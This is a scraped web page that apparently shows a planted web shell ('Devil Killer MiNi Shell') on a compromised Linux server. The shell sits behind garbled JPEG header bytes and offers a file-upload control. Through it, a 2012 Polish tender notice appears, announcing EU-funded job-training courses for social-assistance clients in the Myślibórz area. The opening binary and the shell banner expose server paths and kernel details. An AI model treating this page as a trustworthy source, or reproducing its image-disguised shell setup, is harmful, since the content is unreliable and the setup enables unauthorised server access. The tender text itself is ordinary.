JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121123/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121123/470106-N-2012.html

<p class="kh_header"><b>Myślibórz: Przeprowadzenie szkoleń w ramach projektu pn. Pomocna dłoń, etap III
Znak sprawy: PCPR/206/2012/7.1.2/4</b><br>
<b>Numer ogłoszenia: 470106 - 2012; data zamieszczenia: 23.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Północna 15, 74-300 Myślibórz, woj. zachodniopomorskie, tel. 0-95 747 23 03, faks 0-95 747 23 03.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń w ramach projektu pn. Pomocna dłoń, etap III
Znak sprawy: PCPR/206/2012/7.1.2/4.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń w zakresie aktywizacji zawodowej dla uczestników projektu POMOCNA DŁOŃ współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII: Promocja integracji społecznej; Działania 7.1 Rozwój i upowszechnienie aktywnej integracji Poddziałania 7.1.2 - Rozwój i upowszechnianie aktywnej integracji społecznej przez powiatowe centra pomocy rodzinie w zakresie następujących części:

Część I. Szkolenia z zakresu: Nowoczesny sprzedawca z obsługą kas fiskalnych, ABC przedsiębiorczości dla uczestników z OSP Dębno.
Szczegółowy opis szkoleń w załączniku 1.1 do SIWZ oraz w zakresie wymagań ogólnych w załączniku nr 1a do SIWZ.

Część II. Szkolenia z zakresu: Doradztwo zawodowe z aktywnym poszukiwaniem pracy dla uczestników z OPS Myślibórz.
Szczegółowy opis szkoleń w załączniku 1.2 do SIWZ oraz w zakresie wymagań ogólnych w załączniku nr 1a do SIWZ.

Część III. Szkolenia z zakresu: Doradztwo zawodowe, ABC przedsiębiorczości, Trening kompetencji i umiejętności społecznych dla uczestników z OPS Boleszkowice.
Szczegółowy opis szkoleń w załączniku 1.3 do SIWZ oraz w zakresie wymagań ogólnych w załączniku nr 1a do SIWZ.

Część IV. Szkolenia z zakresu: Doradztwo zawodowe dla uczestników z PCPR Myślibórz.
Szczegółowy opis szkoleń w załączniku 1.4 do SIWZ oraz w zakresie wymagań ogólnych w załączniku nr 1a do SIWZ.

Część V. Szkolenia z zakresu: Przeciwdziałanie przemocy w rodzinie dla uczestników z OPS Myślibórz. 
Szczegółowy opis szkoleń w załączniku 1.5 do SIWZ oraz w zakresie wymagań ogólnych w załączniku nr 1a do SIWZ.

Zamawiający informuje, iż wskazane w szczegółowych opisach szkoleń ilości osób z poszczególnych miejscowości jak i same miejscowości są orientacyjne i mogą ulec zmianie z uwagi na ciągłą rotacje uczestników projektu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie, spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie, spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie, spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeśli wykonawca wykaże, iż w ramach oferowanej części dysponuje lub będzie dysponować:

Część I  
a)	co najmniej jedną osobą, która przeprowadziła jako trener/szkoleniowiec co najmniej 15 h szkoleniowych (45 minut - godzina zajęć/szkoleń/warsztatów) w zakresie tematyki związanej z obsługą kas fiskalnych oraz przygotowaniem do zawodu sprzedawcy-kasjera,
b)	co najmniej jedną osobą, która przeprowadziła jako trener/szkoleniowiec co najmniej 15 h szkoleniowych (45 minut - godzina zajęć/szkoleń/warsztatów) z zakresu ABC przedsiębiorczości.

Część II
co najmniej jedną osobą, która przeprowadziła jako trener/szkoleniowiec co najmniej 15 h szkoleniowych (45 minut - godzina zajęć/szkoleń/warsztatów) w zakresie doradztwa zawodowego.

Część III
a)	co najmniej jedną osobą, która przeprowadziła jako trener/szkoleniowiec co najmniej 15 h szkoleniowych (45 minut - godzina zajęć/szkoleń/warsztatów) w zakresie doradztwa zawodowego,
b)	 co najmniej jedną osobą, która przeprowadziła jako trener/szkoleniowiec co najmniej 15 h szkoleniowych (45 minut - godzina zajęć/szkoleń/warsztatów) z zakresu ABC przedsiębiorczości,
c)	co najmniej jedną osobą, która przeprowadziła jako trener/szkoleniowiec co najmniej 15 h szkoleniowych (45 minut - godzina zajęć/szkoleń/warsztatów) w zakresie treningu kompetencji i umiejętności społecznych.

Część IV
co najmniej jedną osobą, która przeprowadziła jako trener/szkoleniowiec co najmniej 15 h szkoleniowych (45 minut - godzina zajęć/szkoleń/warsztatów) w zakresie doradztwa zawodowego.

Część V
co najmniej jedną osobę, która przeprowadziła jako trener/szkoleniowiec co najmniej 15 h szkoleniowych (45 minut - godzina zajęć/szkoleń/warsztatów) w zakresie przeciwdziałania przemocy w rodzinie.

Zamawiający dopuszcza, aby wykonawca wskazał tę samą osobę dla szkoleń określonych powyżej pod warunkiem spełnienia przez nią warunków określonych dla każdego szkolenia/kursu.

Zamawiający zbada obecność i prawidłowość każdego wymaganego dokumentu i oświadczenia, a także czy wymagany dokument i oświadczenie potwierdza spełnianie warunku nie później niż na dzień składania ofert. Zamawiający dokona formalnej oceny spełniania warunków udziału w postępowaniu w oparciu o analizę oświadczeń lub dokumentów załączonych do oferty. Informacja o spełnianiu przez wykonawców warunków udziału w postępowaniu zgodnie z formułą: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie, spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ; dokument pełnomocnictwa jeśli z przedstawionych dokumentów wynika, że osoba która podpisała ofertę nie jest uprawniona do reprezentacji wykonawcy w obrocie gospodarczym</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany zawartej umowy mogą nastąpić w przypadku, gdy:
a)	ulegnie zmianie stan prawny w zakresie dotyczącym realizowanej umowy, który spowoduje konieczność zmiany sposobu wykonania zamówienia przez Wykonawcę;
b)	wystąpią  przeszkody o obiektywnym charakterze (zdarzenia nadzwyczajne, zewnętrzne i niemożliwe do zapobieżenia a więc mieszczące się w zakresie pojęciowym tzw. siły wyższej.) np. pogoda uniemożliwiająca wykonywanie umowy, zdarzenia nie leżące po żadnej ze stron umowy. Strony mają prawo do skorygowania uzgodnionych zobowiązań i przesunąć termin realizacji maksymalnie o czas trwania siły wyższej. Strony zobowiązują się do natychmiastowego poinformowania się nawzajem o wystąpieniu ww. przeszkód;
c)	zmieni się harmonogramu projektu w zakresie terminu realizacji zamówienia, 
2.	Strony dopuszczają możliwość zmian redakcyjnych oraz zmian będących następstwem zmian danych ujawnionych w rejestrach publicznych.
3.	Strony dopuszczają zmianę kadry (osoby trenera,instruktora,szkoleniowca) bez konieczności sporządzania aneksu do umowy zgodnie z § 2 ust. 1 pkt b umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatmysliborski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Myśliborzu, ul. Północna 15, 74-300 Myślibórz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2012 godzina 12:50, miejsce: Powiatowe Centrum Pomocy Rodzinie w Myśliborzu, Sekretariat ul. Północna 15, 74-300 Myślibórz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Powiatowe Centrum Pomocy Rodzinie w Myśliborzu jest właściwe mocą Porozumienia z dnia 24 sierpnia 2012 r. w sprawie przeprowadzenia procedury zamówień publicznych w ramach projektu Pomocna dłoń, do przeprowadzenia postępowania i udzielenia zamówienia w imieniu i na rzecz następujących jednostek: 1) Powiatowego Centrum Pomocy Rodzinie w Myśliborzu (PCPR Myślibórz), 2) Ośrodka Pomocy Społecznej w Boleszkowicach (OPS Boleszkowice), 3) Ośrodka Pomocy Społecznej w Dębnie (OPS Dębno), 4) Ośrodka Pomocy Społecznej w Myśliborzu (OPS Myślibórz), 5) Gminnego Ośrodka Pomocy Społecznej w Nowogródku Pomorskim (GOPS Nowogródek Pomorski). 2. Umowa z Wykonawcą będzie zwarta na czas określony tj. do dnia 31.12.2012r., jednakże wszystkie szkolenia powinny zostać zakończone najpóźniej do dnia 20.12.2012 r. 3. Tak, w ramach projektu projektu pn. Pomocna dłoń współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII: Promocja integracji społecznej; Działania 7.1 Rozwój i upowszechnienie aktywnej integracji Poddziałania 7.1.2 - Rozwój i upowszechnianie aktywnej integracji społecznej przez powiatowe centra pomocy rodzinie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Nowoczesny sprzedawca z obsługą kas fiskalnych, ABC przedsiębiorczości dla uczestników z OPS Dębno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenia z zakresu: Nowoczesny sprzedawca z obsługą kas fiskalnych, ABC przedsiębiorczości dla uczestników z OPS Dębno

1. Nowoczesny sprzedawca z obsługą kas fiskalnych:
- ilość osób, które zostaną skierowane na kurs: 10 osób; zamieszkujących miejscowości Cychry, Mostno, Więcław, Krześnica, Sarbinowo, Warnice, Oborzany, Smolnica, Dolsk, Dyszno, Różańsko, Grzymiradz. 
- czas trwania szkolenia: 60 godzin, jedna godzina równa się 60 minutom, 
- zakres tematyczny szkolenia powinien, co najmniej obejmować:

I. BLOK KASJER:
- praca kasjera, organizacja i wyposażenie stanowiska pracy kasjera, predyspozycje kasjera, zachowanie, konwersacja, oświadczenie o przyjęciu odpowiedzialności, tajemnica służbowa, zakres czynności, stanowisko kasowe - wyposażenie, rodzaje zabezpieczeń,
- obsługa kas fiskalnych, regulacje prawne dotyczące kas fiskalnych, kryteria i warunki jakim muszą odpowiadać kasy fiskalne, charakterystyka, budowa i tryb pracy kasy fiskalnej,
- ewidencja obrotu kasy, dokumenty kasowe, dokonywanie wypłat i wpłat, wymiana zużytych i uszkodzonych znaków pieniężnych, zasady przeliczania, sortowania i pakowania, oznaczenia opakowań, różnice kasowe, przechowywanie pozostałości kasowej,
- wybrane zagadnienia z prawa bankowego, waluty obce,
- falsyfikaty, zasady i tryb postępowania w przypadku ujawnienia falsyfikatu,
- metody zabezpieczania polskich znaków pieniężnych, znak wodny, włókna ochronne, nitki ochronne, konfetti, znaki optyczne, folia metaliczna, elementy witrażowe, efekt kątowy, znaki utajnione,
- Rozpoznawanie autentyczności polskich znaków pieniężnych format, druk obustronny, nazwa państwa, nazwa jednostki pieniężnej, oznaczanie serii i numerów, data emisji, podpisy osób upoważnionych do sygnowania papierów wartościowych, papier, farba, techniki drukarskie, szata graficzna Elementy plastyczne, wartość nominalna, data emisji, karbowanie monet, Fałszerskie techniki zastępcze

II. BLOK  SPRZEDAWCA  
- psychologia sprzedaży, istota i rodzaje sprzedaży, etapy procesu sprzedaży, nawiązanie kontaktu z nabywcą, identyfikacja potrzeb klienta, reakcja na odmowę klienta w procesie sprzedaży, sprzedaż dostosowana do osobowości nabywcy, techniki komunikacji interpersonalnej w procesie sprzedaży, obsługa i kontakty po sprzedaży, negocjacje sprzedaży i radzenie sobie ze stresem,
- organizacja i techniki sprzedaży, wnętrze punktu sprzedaży, zasady ekspozycji towarów, kształtowanie asortymentu, reklamacja  i obowiązujące przepisy w  zakresie rękojmi i gwarancji, rejestracja sprzedaży, dowody sprzedaży i korekty, odpowiedzialność materialna sprzedawcy, kształtowanie stylu firmowego, dobór i tworzenie strategii reklamowych, charakterystyka towarów - towaroznawstwo, 
- sprzedaż wysyłkowa.
- BHP w obiekcie handlowym, podstawy przepisów bezpieczeństwa i higieny pracy,
- Obsługa programu subiekt
- ćwiczenia  z bloku sprzedawca

III. BLOK  MAGAZYN
- magazyn i organizacja pracy w magazynie, elementy logistyki, magazyn i wyposażenie, obowiązki magazyniera, zabezpieczenie magazynu, podział zapasów, elementy towaroznawstwa w gospodarce 
magazynowej, opakowanie towarów i ich oznakowanie, przechowywanie i magazynowanie towarów
- dokumentacja magazynowa oraz obieg dokumentów i towarów  
- odpowiedzialność materialna, inwentaryzacja, postępowanie w przypadku stwierdzenia różnic w przyjęciu na stan magazynu
- BHP w obiekcie magazynowym, 
- obsługa programów komputerowych:  (np. Symfonia - handel, Magazyn WA-PRO lub Smart) Fakturowanie, książka przychodów, ewidencja towarów, środki trwałe - podstawy.

2. ABC przedsiębiorczości
- ilość osób, które zostaną skierowane na kurs: 34 osoby;
- szkolenie może odbywać się w 2 grupach (2 grupy x 14 h)
- czas trwania szkolenia: 28 godzin, jedna godzina równa się 60 minutom, nie dłużej niż 7 godzin dziennie;
- zakres tematyczny szkolenia powinien, co najmniej obejmować:
- zakładanie, prowadzenie i zasady rozliczeń działalności gospodarczej, 
- zasady marketingu, marketing-mix, 
- analiza otoczenia SWOT i TOWS, 
- public relations, 
- zewnętrzne źródła finansowania działalności gospodarczej: kredyty bankowe, fundusze strukturalne, inne źródła finansowania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Doradztwo zawodowe z aktywnym poszukiwaniem pracy dla uczestników z OPS Myślibórz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenia z zakresu: Doradztwo zawodowe z aktywnym poszukiwaniem pracy dla uczestników z OPS Myślibórz

Ilość osób, które zostaną skierowane na kurs: 28 osób zamieszkujących w niżej wymienionych miejscowościach:
Sulimierz - 1 osoba
Sarbinowo - 1 osoba
Rościn - 1 osoba
Kierzków - 1 osoba
Czerników - 1 osoba
Myśliborzyce - 1 osoba
Głazów - 1 osoba
Tarnowo - 1 osoba
Golenice- 1 osoba
Pniów - 1 osoba
Ławy - 1 osoba
Myślibórz - 17 osób

Czas trwania szkolenia: 12 godzin, jedna godzina równa się 60 minutom, 
Zakres tematyczny szkolenia powinien, co najmniej obejmować:
- analiza potrzeb, 
- oczekiwania i doświadczenia zawodowe uczestników projektu, 
- moje mocne i słabe strony, 
- test preferencji i predyspozycji zawodowych, 
- rynek pracy,
- samoocena i autoanaliza..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Doradztwo zawodowe, ABC przedsiębiorczości, Trening kompetencji i umiejętności społecznych dla uczestników z OPS Boleszkowice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenia z zakresu: Doradztwo zawodowe, ABC przedsiębiorczości, Trening kompetencji i umiejętności społecznych dla uczestników z OPS Boleszkowice.

1. Doradztwo zawodowe
Ilość osób, które zostaną skierowane na kurs: 15 osób zamieszkujących niżej wymienione miejscowości:
- Boleszkowice - 6 osób
- Reczyce - 1 osoba
- Chwarszczany - 2 osoby
- Wysoka - 2 osoby
- Chlewice - 2 osoby
- Porzecze - 1 osoba
- Kaleńsko - 1 osoba

Czas trwania szkolenia: 15 godzin, jedna godzina równa się 60 minutom, 
Szkolenie ma się odbywać się w grupie 15 osobowej,
Zakres tematyczny szkolenia powinien, co najmniej obejmować:
- analiza potrzeb, 
- oczekiwania i doświadczenia zawodowe uczestników projektu, 
- moje mocne i słabe strony, 
- test preferencji i predyspozycji zawodowych, 
- rynek pracy,
- samoocena i autoanaliza.

2. ABC przedsiębiorczości

Ilość osób, które zostaną skierowane na kurs: 5 osób; zamieszkujących niżej wymienione miejscowości:
- Boleszkowice - 1 osoba
- Chlewice - 2 osoby
- Porzecze - 1 osoba
- Chwarszczany - 1 osoba

Szkolenie ma odbywać się w grupie 5 osobowej,
Czas trwania szkolenia: 30 godzin, jedna godzina równa się 60 minutom;
Zakres tematyczny szkolenia powinien, co najmniej obejmować:
- zakładanie, prowadzenie i zasady rozliczeń działalności gospodarczej, 
- zasady marketingu, marketing-mix, 
- analiza otoczenia SWOT i TOWS, 
- public relations, 
- zewnętrzne źródła finansowania działalności gospodarczej: kredyty bankowe, fundusze strukturalne, inne źródła finansowania.

3. Trening kompetencji i umiejętności społecznych

Ilość osób, które zostaną skierowane na kurs: 15 osób; zamieszkujących niżej wymienione miejscowości:
- Boleszkowice - 6 osób
- Reczyce - 1 osoba
- Chwarszczany - 2 osoby
- Wysoka - 2 osoby
- Chlewice - 2 osoby
- Porzecze - 1 osoba
- Kaleńsko - 1 osoba

